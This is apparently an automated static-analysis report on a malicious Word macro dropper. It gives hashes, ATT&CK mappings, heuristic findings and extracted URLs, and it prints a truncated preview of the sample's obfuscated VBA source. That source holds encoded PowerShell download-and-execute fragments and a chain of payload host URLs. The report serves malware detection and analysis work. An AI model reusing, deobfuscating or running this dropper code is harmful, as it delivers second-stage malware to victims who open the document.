Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7a337ec623eaff28…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 140.5 KB
Created: 2018-02-15 00:57:00
Authoring application: Microsoft Office Word
First seen: 2018-02-19
MD5: 2fdb8cc5620773b9ff2aa07660685523
SHA-1: 4ccbca026bf2f890c445c128be78789bda6121c2
SHA-256: 7a337ec623eaff287e1fedbd78d0df3c9a4ff0eb086e9d075254ad755358038f
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function, indicating an attempt to execute external code. The script appears to be designed to download and execute a second-stage payload from one of the embedded URLs, which are suspicious and likely malicious. The ClamAV detection further confirms its malicious nature.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6449686-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6449686-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    Extracted URLs (all found in document text, OLE body):
    • http://rwaOm1+Om1ndanor
    • http://mcf21zbTOYizBXvMbiAjkcZRjcfjYGcnttV� (trailing undecodable byte)
    • http://mcf21zbTOYizBXvMbiAjkcZRjcfjYGcnttV
    • http://schemas.openxmlformats.org/drawingml/2006/main

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 28284 bytes
SHA-256: ffc5a62b30c69d904434dd80d1384f91fc8c7a0872c458a7c9d5da9fcb3bb9e0

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "fVWdJkmmLa"
Function uMOhYikXdX()
On Error Resume Next
RZYDUX = (EcnMGGzYNbW - Int(EjnbhYZtiz) * uWOGodqkkvARV / Oct(DVrOl) - (MSPQNOVhdipwF - Sin(6805997)))
rEWqJwaRDAb = (qszKuWqliDORY - Int(DhizGjbGwt) * HJHCGDMmIN / Oct(sDqWVjhMww) - (DaALzwCRjtFknN - Sin(6864574)))
XssqhVzoozk = (bABfQQapaHj - Int(vYlvdKF) * CvENjrdjmSD / Oct(lzFMzR) - (nzKksPrWLIK - Sin(1447854)))
ppiUzlzcY = (OJGnotUtBwOCHj) + HJjkJKD("wHXNsR0(), KQ5SDC);&(GfPDg+PDg4InyR0'+'+yR0voGf4+Gf4kGyR0Om1+Om1+yR0fpbjiwXjlAj", 6, 64)
wDiwBHVOq = (LdShrKMwsUSacL - Int(CjPYQJVHAI) * cnpRXs / Oct(MvzoVqWjpDE) - (QZwiXpiu - Sin(1827103)))
jYAzhCrQ = (qWRZiiYIawas - Int(PaNOZCjU) * DjsifJSb / Oct(zZYEdWvHnLjdH) - (YJjDJbIrcTZSk - Sin(6353797)))
UmUYQ = (COpwH - Int(TsLzrSSPVn) * vnTYzGJAhGwE / Oct(KmOHkwqiARF) - (VFSJqcHf - Sin(7090131)))
fZJTp = (HEZZwTZ) + HJjkJKD("ftUhBLoqQHwncwDBiim1ogpOm1,[cHar]124 -ReplACE  Om1PDgOm1'+',[c'+'Har]39  -crEPLAcE  '+'([cHar]71+[cHar]122+[cHar]80),[cHar]36) ) ')  -crePLAce  'Om1',[char]39)| & ( $pshoME[21]+$PShomE[30]+'x')PEToJLrVFmOFCtkobRp", 19, 175)
pwSvzDO = (VOHdArqqdoYuno - Int(fjoKf) * vidpSMFfzi / Oct(abbwUaHoHjs) - (PkzQBfwlniV - Sin(5120166)))
bozNPZij = (dnhikLjGpUL - Int(DLGjVXr) * zNETw / Oct(zzzvv) - (BRqmZK - Sin(4436612)))
hjqQwTsPm = (LbaQnEwUr - Int(RHiXj) * iOijMjJu / Oct(FKlUTGLAT) - (YnnfrGfIsdocd - Sin(7078921)))
KmwEMuKYmuK = (ofmFDLiZzK) + HJjkJKD("ipSSMKMWLWHuGaRjuf4yR0+yR0?GOm1+Om1f4);KQyR0+yR05yR0+yR0SDC yR0+'+'yOm1+Om1PDg+'+'PDgR0=yR0+yR0 KQ5envOm1+Om1:yR0+yR0pyR0+yR0ublicyR0+yROm1+Om10 y'+'R0+yR0+yR0+Om1+Om1yR0'+' yR0+yR0Gf4yR0Om1+Om1+yR0'+zrHNjXnKczPuvBl", 18, 183)
SunMJCZqrO = (YQQjdhBuPvj - Int(IMFHvz) * tjkvYhRzczJckP / Oct(GCQIEMLEHC) - (zBTCVzltj - Sin(9954407)))
jXCOMz = (VsCLjYwGSztd - Int(Dqmsli) * csCkQdZbJr / Oct(jfRjYGtdmIAjW) - (XNziN - Sin(8578097)))
kcWsZPFZUr = (wYLcpR - Int(GzUzbHKwoXSfzI) * TbJfhsPazwwjkH / Oct(EiozXn) - (DIPsZZbLhtzC - Sin(830990)))
zsRouPljR = (MzXzFGKjIcuiqa) + HJjkJKD("z.ru/LREyR0Om1+Om1+yR0xBR6/?httyR0'+'+yR0p://www.syR0+yR0ocialPDg+PDgm'+'ediacomOm1+Om1payR0+yR0nOm1+Om1y.ae/qeo'+'2yR0+yR0Az/?h'+'ttp://PDg+PDgsolaflon.eu/yR0'+'+yR0XEZ8s'WBZOHYtpTsOzwLEzmzhOkHhujFhFUcMJvSFYX", 2, 171)
qjLQUdErC = (wlOFjhCVkXEtj - Int(PCjrShq) * brrOuX / Oct(Tuvkzam) - (WosoNiNmIEtR - Sin(4081506)))
OXOjICM = (YXkzpKWO - Int(nfIRdJJjo) * PKDZsdbOFi / Oct(AGrzVYz) - (lcQHTEJEQkczXF - Sin(7748069)))
kQBiTjc = (JVzsWO - Int(RfKnYRSHlJhDAz) * kVjYK / Oct(cjnuSlpAaH) - (WjwbIRlnwc - Sin(8414818)))
oDFRvuDuqzk = (iSkqClIjXAQpS) + HJjkJKD("vtmtWkVjNtdnapIEtcofhPDcGmpCbjecyR0+yR0tGyR0+yR0f4yR0+yR0) Om1+zHWC", 29, 35)
PFwJrismwuQ = (abDzl - Int(Bktzrif) * OzziTOIjlYi / Oct(VVhomW) - (EjJXKMqR - Sin(950433)))
iCrkw = (aBbAu - Int(LCZMGsuqfTiqf) * FKVLa / Oct(FboSc) - (EiLXDHbdWmMJNM - Sin(7394483)))
TiQQjHi = (sriAlCwP - Int(QZsnjNGkJoQ) * HPWPCjSwLzN / Oct(liwkcLB) - (vrmhipmYGYE - Sin(4740011)))
TrJhMZmuq = (sGfcHKBEjU) + HJjkJKD("WNZA1+Om1R0Om1+Om1 Gf4 http://rwaOm1+Om1ndanor'+'pyR0Om1+Om1+yR0hanspyR0+yR0roPDg+PDgjPDg+Om1+Om1PDgecyR0+yR0t.orgyR0+yR0/xIeDFyR0+yROm1+Om10'+'fPFuoptWYwvNMhdDziwTRaXo", 5, 142)
CtThLrjd = (jQdpjMturmt - Int(swwUZrdjEiWT) * FolHkQGmn / Oct(UwWDV) - (jZhZWkDDwz - Sin(3179936)))
qjNnj = (FiFtKSbY - Int(nHVmCF) * dWCoHEUEotAUl / Oct(KmAmjJzaoDb) - (TvRLnTfJZaucMB - Sin(1859102)))
ujHEzzMOz = (EQSHn - Int(cUVzVwuDh) * MKlYncGjobJksX / Oct(fzzWYlUJtT) - (qnzjPVsuQCQkNb - Sin(1865032)))
lNaiwTl = (TLdBBRWIzm) + HJjkJKD("kPSutXTVp(yR0KQOm1+Om15nsadayPDg+PDgR0+yR0sd PDg+PDg= &(Gf4nGyR0+yR0fOm1rLhLhhDCNRRRC", 10, 63)
ziSnEj = (nrzHXPO - Int(uOzCzdaUrOHm) * oijYBYfW / Oct(qCMzcBiqBahJ) - (vOoDNiVvEcSt - Sin(9819156)))
jlIzsINmz = (RiWqjO - Int(XzpwAZ) * AMjEJBnSjwLAB / Oct(lZuGdsNIfkwuh) - (QzENFfusw - Sin(2630299)))
imdkmuYEXF = (zUwwX
... (truncated)